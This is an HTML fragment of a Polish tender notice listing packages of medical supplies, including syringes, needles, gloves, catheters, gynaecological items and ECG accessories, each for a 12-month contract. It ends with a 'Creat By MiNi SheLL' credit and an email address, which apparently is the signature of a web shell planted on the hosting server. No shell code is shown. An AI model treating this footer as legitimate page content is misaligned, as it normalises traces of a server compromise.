<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3 - Drobny sprzęt chirurgiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Strzykawki  jednorazowe 20 ml. - op. a100 szt. - 15 opakowań
Strzykawki  jednorazowe 10 ml. - op. a 100 szt. - 50 opakowań
Strzykawki  jednorazowe 5 ml.  - op. a 100 szt. - 320 opakowań
Strzykawki  jednorazowe 2 ml - op. a 100 szt. - 350 opakowań      
Strzykawka j.uż. do pomp LUER 50 ml - 100 szt.
Igły  jednorazowe 1,1 40 op. - 100 opakowań
Igły  jednorazowe 0,9 40 op. - 250 opakowań
Igły  jednorazowe 0,8 40 op. - 400 opakowań
Igły  jednorazowe 0,7 40 op. - 300 opakowań
Igły  jednorazowe  0,7 30 op. - 60 opakowań
Igły  jednorazowe  0,6 30 op. - 30 opakowań
Igły  jednorazowe  0,6 25 op. - 10 opakowań
Igły  jednorazowe  0,5 25 op. - 120 opakowań
Igły  jednorazowe  0,45 16 op. - 10 opakowań
Igła Motylek 0,6 - 30 szt.
Igła Motylek 0,7 - 300 szt.
Ostrze chirurgiczne sterylne 10 - 2 opakowania
Ostrze chirurgiczne sterylne 11 - 2 opakowania
Jałowy zestaw do usuwania szwów - 150 opakowań
Pęseta chirurgiczna jednorazowa jałowa - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4 - Rękawice diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: XS - 80 opakowań   
Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: S - 1 300 opakowań      
Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: M - 2200 opakowań   
Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: L - 720 opakowań   
Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: XL - 15 opakowań    
Rękawice chirurgiczne lateksowe - rozmiar: 8,0 - 300 par
Rękawice chirurgiczne lateksowe - rozmiar: 7,0 - 300 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5 - Kaniule i cewniki oraz inny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wenflon żółty 24G - 200 szt.
Wenflon niebieski 22G - 1000 szt.
Wenflon różowy 20G - 1000 szt.
Wenflon zielony 18G - 200 szt.
Wenflon fioletowy 26G - 100 szt.
Aparat do przetoczeń płynów infuzyjnych - 2 000 szt.
Aparat do przygotowywania i pobierania leków - 10 szt.
Cewnik Foleya CH 14 - 20 szt.
Cewnik Foleya CH 16 - 20 szt.
Cewnik Foleya CH 18 - 100 szt.
Cewnik Foleya CH 20 - 100 szt.
Cewnik Foleya CH 22 - 100 szt.
Worek do zbiórki moczu poj. 2 l - 250 szt.
Wieszaki plastikowy do worków na mocz, pojedynczy - 40 szt.
Cewnik do odsysania górnych dróg oddechowych 18CH - 100 szt.
Cewnik do podawania tlenu przez nos o długości co najmniej 2 m - 100 szt.
Rurka intubacyjna z mankietem niskociśnieniowym FI 7,5 - 10 szt.
Rurka intubacyjna z mankietem niskociśnieniowym FI 6,5 - 10 szt.
Rurka intubacyjna z mankietem niskociśnieniowym FI 8,0 - 10 szt.
Rurka ustno-gardłowa Guedel 0 (czarna) - 10 szt.
Rurka ustno-gardłowa Guedel 2 (zielona) - 10 szt.
Rurka ustno-gardłowa Guedel 3 (żółta) - 10 szt.
Zgłębnik żołądkowy CH16x1000 - 50 szt.
Zgłębnik żołądkowy CH18x1000- 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6 - Drobny sprzęt ginekologiczny i akcesoria.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Utrwalacz cytologiczny 150-200 ml - 20 opakowań
Żel do USG 0,5L (bez soli) - 400 szt.
Osłonki lateksowe do głowic USG, (opakowanie a 144 sztuki) - 25 opakowań
Pałeczki do pobierania wymazów sterylne 15-22 cm, op. 25 szt.  - 20 opakowań
Szczoteczki cytologiczne trójkątne typu wachlarzyk jałowy - 3500 szt.
Wzierniki typu Cusco rozmiar S, jednorazowego użytku  - 2500 szt.
Wzierniki typu Cusco rozmiar M, jednorazowego użytku - 3300 szt.
Wzierniki typu Cusco rozmiar L, jednorazowego użytku - 200 szt.
Szkiełka cytologiczne z polem do opisu, op. 50 szt. - 60 opakowań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET 7 - Drobny sprzęt medyczny i odzież zabiegowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szpatułki drewniane jałowe, opakowanie: a 100 sztuk. - 500 opakowań
Opaska identyfikacyjna dla dorosłych - 50 szt.
Worek na zwłoki plastikowy zapinany na zamek błyskawiczny - 3 szt.
Staza automatyczna wielokrotnego użytku - możliwość sterylizacji - 30 szt.
Nożyczki 17,5 proste k. ostre - 10 szt.
Rurki karbowane plastikowe do inhalatorów 72 cm - 20 szt.
Rurki karbowane plastikowe do inhalatorów 104 cm - 20 szt.
Ustniki jednorazowe plastikowe do inhalatora - 200 szt.
Maska do inhalatora dziecięca - 40 szt.
Maska do inhalatora dla dorosłych - 50 szt.
Maseczka jednorazowa 3-warstwowa na gumki - 20 opakowań
Fartuch jednorazowy foliowy - 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET 8 - Elektrody, papiery rejestracyjne i drobne urządzenia diagnostyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier do USG - PRINTER SONY upp HD 110 - 160 szt.
Papier do EKG ASCARD, rozmiar: 112 x 25 - 500 szt.
Termometr elektroniczny - 20 szt.
Ciśnieniomierz zegarowy mały - 15 szt.
Gruszka do RR - 15 szt.
Mankiet do RR - 15 szt.
Stetoskop lekarski 1-głowicowy - 20 szt.
Pasek gumowy do EKG - 50 szt.
Elektrody metal. do EKG - 4 komplety
Elektrody przyssawkowe - 4 komplety
Elektrody klamrowe - 4 komplety.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com